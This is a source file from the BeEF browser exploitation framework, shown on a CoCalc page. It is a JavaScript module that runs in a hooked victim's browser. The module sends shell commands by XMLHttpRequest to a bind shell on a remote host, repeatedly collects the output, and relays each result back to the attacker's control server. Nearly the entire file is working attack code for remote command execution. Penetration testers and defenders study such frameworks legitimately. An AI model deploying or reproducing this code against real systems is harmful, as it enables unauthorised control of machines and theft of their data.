CoCalc -- command.js

GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/beefbind/beef_bind_shell/command.js
¹¹⁵⁴ views
1
//
2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function () {
8
    var rhost = '<%= @rhost %>';
9
    var rport = '<%= @rport %>';
10
    var path = '<%= @path %>';
11
    var cmd = '<%= @cmd %>';
12
    var shellcode ='<%= @shellcode %>';
13

14
    var uri = "http://" + rhost + ":" + rport + path;
15

16
    strip_output = function(output){
17

18
        var offset = 0;
19
        for(var c in output){
20
            c = output.charAt(c);
21
            if(c.charCodeAt(0) == 0){
22
                break;
23
            }
24
            offset++;
25
        }
26
        return output.substring(0,offset);
27
    };
28

29
    var counter = 0;
30
    get_additional_cmd_results = function(){
31
        xhr = new XMLHttpRequest();
32
        xhr.onreadystatechange = function(){
33
            if(xhr.readyState == 4){
34
                var result = strip_output(xhr.responseText);
35
                beef.debug("result.length: " + result.length);
36
                if(result.length != 0){
37
                    beef.debug("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
38
                    beef.net.send("<%= @command_url %>", <%= @command_id %>, result);
39
                        counter++;
40
                        setTimeout("get_additional_cmd_results()",500);
41
                        }
42
             }else{ // No more command results, ready to send another command.
43
                beef.debug("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
44
            }
45
        };
46
        xhr.open("GET", uri, false);
47
        xhr.send(null);
48
    };
49

50
    get_prompt = function () {
51

52
        xhr = new XMLHttpRequest();
53
        xhr.onreadystatechange = function(){
54
            if(xhr.readyState == 4){
55
                beef.debug("get_prompt: Retrieved prompt");
56
                var prompt = strip_output(xhr.responseText);
57
                beef.debug(prompt);
58
                beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt);
59

60
                //send command
61
                send_command(cmd);
62
            }
63
        };
64
        xhr.open("GET", uri, false);
65
        xhr.send(null);
66
    };
67

68
    send_command = function(command){
69
        xhr = new XMLHttpRequest();
70
        xhr.onreadystatechange = function(){
71
            var cmd_result = strip_output(xhr.responseText);
72
            beef.debug(cmd_result);
73
            beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result);
74
        };
75
        xhr.open("POST", uri, false);
76
        xhr.setRequestHeader("Content-Type", "text/plain");
77
	if (shellcode == 'Linux'){
78
            command = "cmd=" + command + "\n"; // very important only LF
79
        }else{
80
            command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?"
81
        }
82
        xhr.send(command);
83
        setTimeout("get_additional_cmd_results()",500);
84
    };
85

86

87

88
get_prompt();
89

90
});
91

92

93
Product

Resources

Company
